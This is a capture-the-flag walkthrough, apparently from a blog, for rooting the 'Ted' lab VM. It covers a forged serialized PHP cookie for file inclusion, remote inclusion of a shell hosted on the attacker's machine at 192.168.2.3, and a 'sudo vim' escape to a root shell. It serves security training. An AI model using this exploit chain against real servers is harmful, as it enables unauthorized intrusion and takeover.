Today we are
going to take a new challenge Ted. The credit for making this VM machine goes
to “Avraham Cohen” and it is a boot2root challenge where we have to root the
server to complete the challenge. You can download this VM here
Security Level:
Beginner/ Intermediate
Penetrating Methodology:
Scanning
·
NMAP
·
Dirb
Enumeration
·
Browsing the website
·
Burpsuite
Exploitation
·
Analyze and change php code to
get
Privilege Escalation
·
Sudo permission for vim command
Walkthrough:
Scanning:
First thing first, scan the vulnerable
machine using nmap
nmap -p-
-A 192.168.2.6
Here we got only two ports, 80 and 22
We browsed the website on port 80 and got
the message hinting that we might get something in cookies
When we intercepted the request, there was
a very lengthy value for a cookie. The value for cookie user was a base64 encoded value
After decoding the value gave us a
username, we tried to change it to something else but not possible
For a moment, we kept it aside and tried to
get all the available directories using dirb
dirb http://192.168.2.6
Here we found one interesting directory
named backup
We visited the backup directory on the web
server and found a zip file over there
We downloaded the zip file and extracted
the contents and found three files
Let’s check the contents of the files
starting from
1)
index.php
2)
user.class.php
3) log.class.php
After carefully analysing the code of file index.php and user.class.php, we came to know that we can try to get base64
encoded value of cookie user by just
adjusting a function call from index.php to user.class.php. So, we added one
single line in the end to display the base64 value encoded in similar format as
the user cookie value but this time with another user i.e. admin
echo base64_encode(serialize(new
User(‘admin’)));
Now let’s try to run the php code and check
the output of the same,
php user.class.php
we got a base64 encoded value which we will
try to use as the value of user cookie
Well the base64 cookie value worked but
nothing much helpful, so we started to look for something else. We checked the log.class.php, we found that the Log
class is having a include
function to include a log file but the parameter type_log is not assigned any value. We assigned the valiable with a
the path of passwd file as the value.
Also alongside that we made a small change
in the user class, we replaced the function call of the Welcome class to the
function call of constructor of the Log class.
Now when we tried to run the user.class.php
file again, we found that the passwd file was displayed and we got the base64
encoded value which we can use as the cookie.
php user.class.php
When we tried the base64 encoded cookie
value in the webpage, we got the passwd file from the target machine,
confirming we have a file inclusion vulnerability
Now that we have verified the presence of
file inclusion vulnerability, we created a remote code execution file and
started the python server
Now we edit the log class to change the
file path variable to the url of our shell
Private $type_log =
“http://192.168.2.3/shell.php”
After putting the code in place, its time
to get the cookie value to execute
php user.class.php
When we used the cookie value and provided
the cmd parameter with ifconfig command
While checking the contents, we found a
file named credentials.txt.bak
We tried to check the contents and found
something like a set of credentials, let’s try to use these credentials
We used the credentials for ssh and got
access. While enumerating we found the first flag
ssh sk4@192.168.2.6
ls
cat flag.txt
Now we have to escalate the privilege, we
tried to get sudo permissions for current user. We found we have sudo
permissions for vim editor
sudo -l
We used privilege escalation through vim
editor and got the root shell
sudo vim
:!/bin/bash
cd /root
ls
cat fl4g.txt
0 comments:
Post a Comment